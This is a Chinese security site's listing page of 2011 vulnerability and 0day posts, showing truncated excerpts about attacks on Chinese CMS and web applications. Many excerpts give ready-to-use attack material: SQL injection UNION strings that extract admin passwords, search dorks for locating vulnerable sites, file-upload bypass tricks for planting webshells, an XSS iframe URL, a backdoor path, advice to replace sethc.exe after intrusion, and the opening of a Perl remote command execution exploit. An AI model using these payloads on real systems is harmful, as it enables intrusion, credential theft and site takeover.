首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  vsserver
  当前位置:主页>安全文章>文章资料>漏洞资料>列表
dotnot编辑器漏洞
  日期:2011-07-11 11:46:08 点击:41 评论:0
没对一些字符过滤造成漏洞。 dotnot百科 http://baike.baidu.com/view/1678378.htm 1. IIS6.0+03 直接传x.asp;x.jpg 也可建X.ASP文件夹 2. 如果上传目录没有执行权限,再次利用重命名功能可以,重命名名字加上 ../ 可以实现文件移动到上级目录,这样就可以突破上传目录
EC_word企业管理系统注入漏洞利用
  日期:2011-07-11 11:45:45 点击:108 评论:0
该程序采用枫叶通用防注入1.0 asp版,此防注入完全鸡肋,该网站程序 pro_show.asp 有cookies注入或者变型注入,注入前可以先判断一下字段数:ORdeR By xx 注入语句:ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password1,12,13,14,15,16,17,18,19,20,21,22,23,
dz7.2 HTTP 头注入漏洞
  日期:2011-07-11 11:45:18 点击:300 评论:0
dz7.2HTTP头注入漏洞20107/7/,dz7.2headerinjectionvulnerability20107/7/ image.php: header header('location: '.$boardurl.$thumbfile); $boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace(//+(api|archiver|wap)?/*$/i, '', substr(
shopxp网上购物系统v7.4爆密码0day
  日期:2011-07-11 11:42:07 点击:150 评论:0
洞版本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.asp shopxp_news.asp 后台shopxp_admin 暴密码的语句: /TEXTBOX2.ASP?action=modifynews%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
睿拓旅游信息门户系统 1.1 注入漏洞
  日期:2011-07-07 17:51:12 点击:58 评论:0
睿拓旅游信息门户系统是永州睿拓旅游信息网站管理系统包括了企业网站常用的各种功能,带完整的后台管理系统,本程序无任何功能限制下载即可使用 源码下载:http://www.mycodes.net/19/2714.htm 工具:阿D,明小子等 加表:web_admin 加字段:loginname 不怕麻烦也可手工猜解
奶茶加盟店网站源码 1.0 注入漏洞+后门
  日期:2011-07-07 17:50:20 点击:63 评论:0
默认后台:admin/admin_login.asp 源码下载:http://www.mycodes.net/25/4540.htm exp: union select 1,txqpass,3,4,5,txqname,7,8,9 from admin test: http://localhost/brand.asp?a_flid=1 union select 1,txqpass,3,4,5,txqname,7,8,9 from admin 后门: http://localh
Discuz!NT3.6 跨站漏洞 官网测试
  日期:2011-07-04 17:47:24 点击:75 评论:0
登录框提交用户名和密码的时候存在跨站漏洞 http://nt.discuz.net/login.aspx?postusername=%22%3E%3Ciframe%20src=%22http://www.hackqing.com%22%3E 作者:猪哥靓
网络商城购物系统v3.0全功能版 上传漏洞
  日期:2011-07-04 17:46:14 点击:123 评论:0
拿赌博站时,遇到的充值地址在这个程序的站点上,所以就去下载了份,略过看注入点,直接看上传地方. 文件u_sc1.asp源码: !--#include file=../include/yiwebchina.asp-- % session(fuptype)=request(fuptype) 此处先接受fuptype,存入session(fuptype) ,下一个文件需
WordPress 3.1.3 注入漏洞(最新)
  日期:2011-07-04 17:45:49 点击:156 评论:0
第一个: get_terms()过滤器文件中声明taxonomy.php没有正确验证用户输入,允许攻击者构建任意sql命令,可用于盲注。 以下网址可用于执行SQL盲注攻击 [SQL injection] sql注入 http://localhost/wp-admin/edit-tags.php?taxonomy=link_categoryorderby=[SQL injection
Discuz! X2.0 SQL注入漏洞 EXP
  日期:2011-07-04 17:42:17 点击:120 评论:0
DZ2.0直接暴管理账号密码(默认前缀的情况下) http://XXXXXXXX/forum.php?mod=attachmentfindpost=ssaid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5h
PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码0day
  日期:2011-07-04 17:40:54 点击:24 评论:0
PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术 在文件Action.asp中: ElseIf Request.QueryString(action) = updatepassto Then //第307行 If ChkPost() Then Dim e_Pass, e_RePass
Nuclear-Blog v4.0 留言板的 XSS 漏洞
  日期:2011-07-01 10:28:39 点击:56 评论:0
其实此漏洞,在当时发布 Nuclear-Blog v4.0 源码的当天,就被发现了,发现的人是t00ls某核心,然后我直接补了,但是网盘下载的依然没补,所以目前市面上所有 Nuclear-Blog v4.0 均存在此漏洞,不知道有没有别人发现。 这是一个XSS漏洞,这个漏洞纯属是我的疏忽,漏洞在
某企业站系统SQL注入批量拿shell漏洞
  日期:2011-06-30 16:22:40 点击:249 评论:0
关键字:inurl:hn_type.asp?id= 利用工具:明小子,阿D 等 默认后台:admin/login.asp getshell:后台有备份,你懂的 form:Mr.DzY Blog
掏帝管理平台安全漏洞
  日期:2011-06-30 16:21:58 点击:48 评论:0
官网: http://www.taodisoft.com/ 1、演示站后台竟然有一个地方可上传图片,没有禁止上传。 2、上传图片简单过滤,很容易突破,上传php文件,并能执行。 3、服务器(vps)配置严重低级,拿到webshell之后直接是系统权限,windows系统,替换sethc.exe,直接远程桌面连接
Discuz! X2 SQL注射漏洞,支持Union
  日期:2011-06-30 16:19:58 点击:1753 评论:0
Discuz! X2 SQL注射漏洞,支持Union 详细说明: 文件: sourcemoduleforumforum_attachment.php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid'
InnovaStudio WYSIWYG Editor 3.1 【php版】任意上传文件漏洞
  日期:2011-06-30 16:19:35 点击:94 评论:0
漏洞一 任意上传文件[magic_quotes_gpc=Off] 漏洞文件:assetmanager.php POST inpCurrFolder2=/var/www/shell.php%00 漏洞代码:第42行 if(isset($_FILES[File1])) { if(isset($_POST[inpCurrFolder2]))$currFolder=$_POST['inpCurrFolder2']; //目录可以构造magic_qu
风讯 4.0之前所有版本通杀拿SHELL 0day
  日期:2011-06-30 16:19:08 点击:95 评论:0
自己搞定后台权限 直接:/admin/SelectManageDir/FolderImageList.asp?Type=AddFolderPath=/UploadFile/1.asp//CurrPath=/UploadFileShowVirtualPath= 会自己跳转文件管理页面,新建1.asp文件夹 或者 EXP: form name=FileForm method=post enctype=multipart/form-dat
vBseo(百度推广)远程执行漏洞
  日期:2011-06-30 16:16:57 点击:184 评论:0
!/usr/bin/perl #################################################################### # vBseo 3.1.0 (vbseo.php vbseourl) Remote Command Execution Exploit # vendor: http://www.vbseo.com/ # # Author: Jose Luis Gongora Fernandez (a.k.a) JosS # twitter: @
易通企业网站最新0DAY漏洞
  日期:2011-06-30 16:16:32 点击:100 评论:0
易通企业网站系统也称易通企业网站程序,是易通公司开发中国首套免费提供企业网站模板的营销型企业网站管理系统,系统前台生成html、完全符合SEO、同时有在线客服、潜在客户跟踪、便捷企业网站模板制作、搜索引擎推广等功能的企业网站系统。 官网:http://www.cmseasy.
Modoer 1.2.5 注入0day
  日期:2011-06-27 16:38:52 点击:111 评论:0
这两天都很忙 无意来tools看了下 一个农村娃发布的Modoer 1.2.5 注入0day 也没介绍清楚 怎么利用 就研究了下 发布个简单的利用方法 共享下 至于拿shell 没怎么研究! 演示站点: http://www.ytdianping.com 关键字:intitle:Powered by Modoer intitle:游戏 可以根据需
共37页/730条记录 首页 上一页 [1] [2] [3] [4] [5] 6 [7] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  入侵实例
  Exploits
  系统安全
  网络安全
  网络基础
  病毒分析
漏洞资料
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved